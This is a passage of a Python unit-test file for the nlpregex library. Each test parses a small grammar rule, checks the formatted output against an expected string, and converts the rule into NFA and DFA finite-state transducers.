# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst03 = DFA_from_NFA(fst01, True)
# fst03.draw('dfa2', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0009(self):
spec01 = '<nt01>:( t02 | t03 );'
spec_expected = '( t02 | t03 )'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0009b(self):
spec01 = '<nt01>:( t02[token01] | t03 );'
spec_expected = '( t02 [ token01 ] | t03 )'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0009c(self):
spec01 = '<nt01>:( t02 | t03 [token01]);'
spec_expected = '( t02 | t03 [ token01 ] )'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0009e(self):
spec01 = '<nt01>:( t02 | t03) [token01];'
spec_expected = '( t02 | t03 ) [ token01 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0009f(self):
spec01 = '<nt01>:( t02 [token01]| t03[token02]) [token03];'
spec_expected = '( t02 [ token01 ] | t03 [ token02 ] ) [ token03 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0010(self):
spec01 = '<nt01>:t02? t03;'
spec_expected = 't02? t03'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0010b(self):
spec01 = '<nt01>:(t02 [token01])? t03;'
spec_expected = '( t02 [ token01 ] )? t03'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0010c(self):
spec01 = '<nt01>:(t02?)[token01] t03;'
spec_expected = '( t02? ) [ token01 ] t03'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0010d(self):
spec01 = '<nt01>:t02? t03 [token01];'
spec_expected = 't02? t03 [ token01 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0010e(self):
spec01 = '<nt01>:(t02? t03 )[token01];'
spec_expected = '( t02? t03 ) [ token01 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0010f(self):
spec01 = '<nt01>:(((t02 [token01])?)[token02] t03 [token03])[token04];'
spec_expected = '( ( ( t02 [ token01 ] )? ) [ token02 ] t03 [ token03 ] ) [ token04 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0011(self):
spec01 = '<nt01>:t02{0,1} t03;'
spec_expected = 't02? t03'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0011b(self):
spec01 = '<nt01>:(t02[token01]){0,1} t03;'
spec_expected = '( t02 [ token01 ] )? t03'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0012(self):
spec01 = '<nt01>:( t02 t03 )?;'
spec_expected = '( t02 t03 )?'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0012b(self):
spec01 = '<nt01>:( t02 [token01] t03 )?;'
spec_expected = '( t02 [ token01 ] t03 )?'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0012c(self):
spec01 = '<nt01>:( t02 [token01] t03 [token02] )?;'
spec_expected = '( t02 [ token01 ] t03 [ token02 ] )?'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0012d(self):
spec01 = '<nt01>:(( t02 t03 ) [token01])?;'
spec_expected = '( ( t02 t03 ) [ token01 ] )?'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0012e(self):
spec01 = '<nt01>:((( t02[token01] t03[token02] ) [token03])?)[token04];'
spec_expected = '( ( ( t02 [ token01 ] t03 [ token02 ] ) [ token03 ] )? ) [ token04 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0013(self):
spec01 = '<nt01>:( t02 t03 ){0,1};'
spec_expected = '( t02 t03 )?'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0013b(self):
spec01 = '<nt01>:((( t02[token01] t03[token02] ) [token03]){0,1})[token04];'
spec_expected = '( ( ( t02 [ token01 ] t03 [ token02 ] ) [ token03 ] )? ) [ token04 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0014(self):
spec01 = '<nt01>:t02* t03;'
spec_expected = 't02* t03'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0014b(self):
spec01 = '<nt01>:(t02 [token01])* t03;'
spec_expected = '( t02 [ token01 ] )* t03'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0014c(self):
spec01 = '<nt01>:t02* t03[token01];'
spec_expected = 't02* t03 [ token01 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0014d(self):
spec01 = '<nt01>:(t02[token01])* t03[token02];'
spec_expected = '( t02 [ token01 ] )* t03 [ token02 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0014e(self):
spec01 = '<nt01>:((t02[token01])*)[token02] t03[token03];'
spec_expected = '( ( t02 [ token01 ] )* ) [ token02 ] t03 [ token03 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0014f(self):
spec01 = '<nt01>:[token04](((t02[token01])*)[token02] t03[token03])[token05];'
spec_expected = '[ token04 ] ( ( ( t02 [ token01 ] )* ) [ token02 ] t03 [ token03 ] ) [ token05 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0014z(self):
spec01 = '<nt01>:t02* ((t03 [token01])[token02])[token03];'
spec_expected = 't02* t03 [ token01 token02 token03 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0015(self):
spec01 = '<nt01>:t02 t03*;'
spec_expected = 't02 t03*'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0015b(self):
spec01 = '<nt01>:t02 [token01]t03*;'
spec_expected = 't02 [ token01 ] t03*'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0015c(self):
spec01 = '<nt01>:t02 (t03[token01])*;'
spec_expected = 't02 ( t03 [ token01 ] )*'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0015d(self):
spec01 = '<nt01>:t02 (t03*)[token01];'
spec_expected = 't02 ( t03* ) [ token01 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0015e(self):
spec01 = '<nt01>:t02 [token01] (t03[token02])*;'
spec_expected = 't02 [ token01 ] ( t03 [ token02 ] )*'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0015f(self):
spec01 = '<nt01>:t02 [token01] ((t03[token02])*)[token03];'
spec_expected = 't02 [ token01 ] ( ( t03 [ token02 ] )* ) [ token03 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0015g(self):
spec01 = '<nt01>:[token04](t02 [token01] ((t03[token02])*)[token03])[token05];'
spec_expected = '[ token04 ] ( t02 [ token01 ] ( ( t03 [ token02 ] )* ) [ token03 ] ) [ token05 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0016(self):
spec01 = '<nt01>:(t02 t03)*;'
spec_expected = '( t02 t03 )*'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0016b(self):
spec01 = '<nt01>:(t02[token01] t03)*;'
spec_expected = '( t02 [ token01 ] t03 )*'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0016c(self):
spec01 = '<nt01>:(t02 t03[token01])*;'
spec_expected = '( t02 t03 [ token01 ] )*'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0016d(self):
spec01 = '<nt01>:(t02[token01] t03[token02])*;'
spec_expected = '( t02 [ token01 ] t03 [ token02 ] )*'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0016e(self):
spec01 = '<nt01>:((t02[token01] t03[token02])*)[token03];'
spec_expected = '( ( t02 [ token01 ] t03 [ token02 ] )* ) [ token03 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0017(self):
spec01 = '<nt01>:t02+ t03;'
spec_expected = 't02+ t03'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0017b(self):
spec01 = '<nt01>:(t02 [token01])+ t03;'
spec_expected = '( t02 [ token01 ] )+ t03'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0017c(self):
spec01 = '<nt01>:t02+ t03 [token01];'
spec_expected = 't02+ t03 [ token01 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0017d(self):
spec01 = '<nt01>:(t02[token01])+ t03 [token02];'
spec_expected = '( t02 [ token01 ] )+ t03 [ token02 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0017e(self):
spec01 = '<nt01>:[token05]((t02[token01])+ t03 [token02])[token04];'
spec_expected = '[ token05 ] ( ( t02 [ token01 ] )+ t03 [ token02 ] ) [ token04 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0018(self):
spec01 = '<nt01>:t02 t03+;'
spec_expected = 't02 t03+'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0018b(self):
spec01 = '<nt01>:t02 [token01]t03+;'
spec_expected = 't02 [ token01 ] t03+'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0018c(self):
spec01 = '<nt01>:t02 (t03 [token01])+;'
spec_expected = 't02 ( t03 [ token01 ] )+'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0018d(self):
spec01 = '<nt01>:t02 [token01] (t03 [token02])+;'
spec_expected = 't02 [ token01 ] ( t03 [ token02 ] )+'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0018e(self):
